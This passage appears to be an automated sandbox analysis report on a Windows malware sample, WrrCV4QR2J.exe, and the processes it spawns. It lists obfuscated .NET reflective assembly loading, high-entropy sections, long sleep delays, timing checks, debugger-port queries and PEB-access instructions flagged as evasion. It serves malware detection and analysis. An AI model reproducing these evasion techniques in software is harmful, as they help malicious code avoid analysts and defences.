            Source: 0.2.WrrCV4QR2J.exe.2ea469c.3.raw.unpack, -Module-.cs .Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.2ea469c.3.raw.unpack, wA.cs .Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.5ac0000.6.raw.unpack, -Module-.cs .Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.5ac0000.6.raw.unpack, wA.cs .Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.cs .Net Code: jyoK6eXlCS System.Reflection.Assembly.Load(byte[])
            Source: 4.2.isoburn.exe.4cc3814.2.raw.unpack, Token_Toolbar.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 6.2.UHPrrMeffyCaz.exe.2753814.1.raw.unpack, Token_Toolbar.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: initial sample Static PE information: section name: .text entropy: 7.765104825647267
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, uZsT5V3p7CYwSeRgrW.csHigh entropy of concatenated method names: 'UrEkVrepPu', 'hCokTotoli', 'EntkSXy8FU', 'Cftkgs0Msi', 'SoPkuyxMAX', 'f0akHvnqGL', 'HGNkF3N0MO', 'uiBkmA56vc', 'l3WkDDxIbE', 'gDSkfGO8vP'
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\isoburn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: WrrCV4QR2J.exe PID: 4480, type: MEMORYSTR
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Code function: 2_2_015B096E rdtsc 2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 9749
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe API coverage: 1.4 %
            Source: C:\Windows\SysWOW64\isoburn.exe API coverage: 2.6 %
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe TID: 2816 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 7384 Thread sleep count: 223 > 30
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 7384 Thread sleep time: -446000s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 7384 Thread sleep count: 9749 > 30
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 7384 Thread sleep time: -19498000s >= -30000s
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524 Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524 Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524 Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524 Thread sleep count: 41 > 30
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe TID: 7524 Thread sleep time: -41000s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 4_2_028EC280 FindFirstFileW,FindNextFileW,FindClose, 4_2_028EC280
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4121097965.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\isoburn.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Code function: 2_2_004173F3 LdrLoadDll, 2_2_004173F3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Code function: 2_2_0156C156 mov eax, dword ptr fs:[00000030h] 2_2_0156C156
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E3DB mov eax, dword ptr fs:[00000030h]2_2_0161E3DB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E3DB mov ecx, dword ptr fs:[00000030h]2_2_0161E3DB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161E3DB mov eax, dword ptr fs:[00000030h]2_2_0161E3DB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01568397 mov eax, dword ptr fs:[00000030h]2_2_01568397
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01568397 mov eax, dword ptr fs:[00000030h]2_2_01568397
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01568397 mov eax, dword ptr fs:[00000030h]2_2_01568397
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159438F mov eax, dword ptr fs:[00000030h]2_2_0159438F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159438F mov eax, dword ptr fs:[00000030h]2_2_0159438F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E388 mov eax, dword ptr fs:[00000030h]2_2_0156E388
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E388 mov eax, dword ptr fs:[00000030h]2_2_0156E388
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E388 mov eax, dword ptr fs:[00000030h]2_2_0156E388
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156A250 mov eax, dword ptr fs:[00000030h]2_2_0156A250
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576259 mov eax, dword ptr fs:[00000030h]2_2_01576259
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620274 mov eax, dword ptr fs:[00000030h]2_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F8243 mov eax, dword ptr fs:[00000030h]2_2_015F8243
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F8243 mov ecx, dword ptr fs:[00000030h]2_2_015F8243
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574260 mov eax, dword ptr fs:[00000030h]2_2_01574260
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574260 mov eax, dword ptr fs:[00000030h]2_2_01574260
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574260 mov eax, dword ptr fs:[00000030h]2_2_01574260
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156826B mov eax, dword ptr fs:[00000030h]2_2_0156826B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156823B mov eax, dword ptr fs:[00000030h]2_2_0156823B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A2C3 mov eax, dword ptr fs:[00000030h]2_2_0157A2C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802E1 mov eax, dword ptr fs:[00000030h]2_2_015802E1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802E1 mov eax, dword ptr fs:[00000030h]2_2_015802E1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802E1 mov eax, dword ptr fs:[00000030h]2_2_015802E1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov ecx, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016062A0 mov eax, dword ptr fs:[00000030h]2_2_016062A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F0283 mov eax, dword ptr fs:[00000030h]2_2_015F0283
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F0283 mov eax, dword ptr fs:[00000030h]2_2_015F0283
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F0283 mov eax, dword ptr fs:[00000030h]2_2_015F0283
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE284 mov eax, dword ptr fs:[00000030h]2_2_015AE284
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE284 mov eax, dword ptr fs:[00000030h]2_2_015AE284
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802A0 mov eax, dword ptr fs:[00000030h]2_2_015802A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015802A0 mov eax, dword ptr fs:[00000030h]2_2_015802A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578550 mov eax, dword ptr fs:[00000030h]2_2_01578550
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578550 mov eax, dword ptr fs:[00000030h]2_2_01578550
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A656A mov eax, dword ptr fs:[00000030h]2_2_015A656A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A656A mov eax, dword ptr fs:[00000030h]2_2_015A656A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A656A mov eax, dword ptr fs:[00000030h]2_2_015A656A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01606500 mov eax, dword ptr fs:[00000030h]2_2_01606500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644500 mov eax, dword ptr fs:[00000030h]2_2_01644500
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E53E mov eax, dword ptr fs:[00000030h]2_2_0159E53E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580535 mov eax, dword ptr fs:[00000030h]2_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015765D0 mov eax, dword ptr fs:[00000030h]2_2_015765D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA5D0 mov eax, dword ptr fs:[00000030h]2_2_015AA5D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA5D0 mov eax, dword ptr fs:[00000030h]2_2_015AA5D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE5CF mov eax, dword ptr fs:[00000030h]2_2_015AE5CF
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE5CF mov eax, dword ptr fs:[00000030h]2_2_015AE5CF
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015725E0 mov eax, dword ptr fs:[00000030h]2_2_015725E0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC5ED mov eax, dword ptr fs:[00000030h]2_2_015AC5ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC5ED mov eax, dword ptr fs:[00000030h]2_2_015AC5ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E5E7 mov eax, dword ptr fs:[00000030h]2_2_0159E5E7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE59C mov eax, dword ptr fs:[00000030h]2_2_015AE59C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A4588 mov eax, dword ptr fs:[00000030h]2_2_015A4588
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01572582 mov eax, dword ptr fs:[00000030h]2_2_01572582
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01572582 mov ecx, dword ptr fs:[00000030h]2_2_01572582
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015945B1 mov eax, dword ptr fs:[00000030h]2_2_015945B1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015945B1 mov eax, dword ptr fs:[00000030h]2_2_015945B1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F05A7 mov eax, dword ptr fs:[00000030h]2_2_015F05A7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F05A7 mov eax, dword ptr fs:[00000030h]2_2_015F05A7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F05A7 mov eax, dword ptr fs:[00000030h]2_2_015F05A7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159245A mov eax, dword ptr fs:[00000030h]2_2_0159245A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156645D mov eax, dword ptr fs:[00000030h]2_2_0156645D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE443 mov eax, dword ptr fs:[00000030h]2_2_015AE443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159A470 mov eax, dword ptr fs:[00000030h]2_2_0159A470
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159A470 mov eax, dword ptr fs:[00000030h]2_2_0159A470
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159A470 mov eax, dword ptr fs:[00000030h]2_2_0159A470
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FC460 mov ecx, dword ptr fs:[00000030h]2_2_015FC460
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8402 mov eax, dword ptr fs:[00000030h]2_2_015A8402
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8402 mov eax, dword ptr fs:[00000030h]2_2_015A8402
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8402 mov eax, dword ptr fs:[00000030h]2_2_015A8402
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156C427 mov eax, dword ptr fs:[00000030h]2_2_0156C427
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E420 mov eax, dword ptr fs:[00000030h]2_2_0156E420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E420 mov eax, dword ptr fs:[00000030h]2_2_0156E420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156E420 mov eax, dword ptr fs:[00000030h]2_2_0156E420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F6420 mov eax, dword ptr fs:[00000030h]2_2_015F6420
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015704E5 mov ecx, dword ptr fs:[00000030h]2_2_015704E5
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A44B0 mov ecx, dword ptr fs:[00000030h]2_2_015A44B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FA4B0 mov eax, dword ptr fs:[00000030h]2_2_015FA4B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015764AB mov eax, dword ptr fs:[00000030h]2_2_015764AB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FE75D mov eax, dword ptr fs:[00000030h]2_2_015FE75D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570750 mov eax, dword ptr fs:[00000030h]2_2_01570750
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F4755 mov eax, dword ptr fs:[00000030h]2_2_015F4755
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2750 mov eax, dword ptr fs:[00000030h]2_2_015B2750
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2750 mov eax, dword ptr fs:[00000030h]2_2_015B2750
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A674D mov esi, dword ptr fs:[00000030h]2_2_015A674D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A674D mov eax, dword ptr fs:[00000030h]2_2_015A674D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A674D mov eax, dword ptr fs:[00000030h]2_2_015A674D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578770 mov eax, dword ptr fs:[00000030h]2_2_01578770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580770 mov eax, dword ptr fs:[00000030h]2_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570710 mov eax, dword ptr fs:[00000030h]2_2_01570710
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A0710 mov eax, dword ptr fs:[00000030h]2_2_015A0710
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC700 mov eax, dword ptr fs:[00000030h]2_2_015AC700
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A273C mov eax, dword ptr fs:[00000030h]2_2_015A273C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A273C mov ecx, dword ptr fs:[00000030h]2_2_015A273C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A273C mov eax, dword ptr fs:[00000030h]2_2_015A273C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EC730 mov eax, dword ptr fs:[00000030h]2_2_015EC730
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC720 mov eax, dword ptr fs:[00000030h]2_2_015AC720
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC720 mov eax, dword ptr fs:[00000030h]2_2_015AC720
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157C7C0 mov eax, dword ptr fs:[00000030h]2_2_0157C7C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F07C3 mov eax, dword ptr fs:[00000030h]2_2_015F07C3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015747FB mov eax, dword ptr fs:[00000030h]2_2_015747FB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015747FB mov eax, dword ptr fs:[00000030h]2_2_015747FB
